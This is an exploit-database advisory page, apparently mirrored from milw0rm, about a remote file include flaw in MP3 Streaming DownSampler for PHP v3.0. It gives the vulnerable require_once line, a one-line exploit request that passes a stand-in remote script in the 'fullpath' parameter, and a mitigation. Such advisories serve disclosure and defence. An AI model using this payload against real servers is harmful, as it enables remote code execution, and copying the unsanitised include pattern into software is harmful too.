header-logo
Suggest Exploit
vendor:
MP3 Streaming DownSampler for PHP
by:
DJR, xoron, K@OS, trampfd, Konaksinamon, KripteX, sakkure, Seyfullah, MaSSiMo, Kano, whiteguide
7,5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: MP3 Streaming DownSampler for PHP
Affected Version From: 3.0
Affected Version To: 3.0
Patch Exists: NO
Related CWE: N/A
CPE: a:mp3_streaming_downsampler_for_php:mp3_streaming_downsampler_for_php:3.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

MP3 Streaming DownSampler for PHP v3.0 (fullpath) Remote File Include Exploit

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'fullpath' parameter to the 'Core/core.inc.php' script. This can be exploited to include arbitrary files from remote locations by passing a URL in the 'fullpath' parameter. Successful exploitation requires that 'allow_url_include' is set to 'On' in the 'php.ini' configuration file.

Mitigation:

Disable 'allow_url_include' in the 'php.ini' configuration file.
Source

Exploit-DB raw data:

Script: MP3 Streaming DownSampler for PHP v3.0 (fullpath) Remote File Include Exploit
Version: 3.0
Script Download: http://damac.us/Projects/mp3SDS/archive/mp3SDS-3.0.tgz
Code: require_once("$fullpath/Core/FormatName.fnc.php");
Exploit: Core/core.inc.php?fullpath=evilscripts?
Found: Cyber-Security
Thanx: DJR, xoron, K@OS, trampfd, Konaksinamon, KripteX, sakkure, Seyfullah, MaSSiMo, Kano, whiteguide

# milw0rm.com [2006-10-28]

Navigation

Suggest Exploit

Services By CQR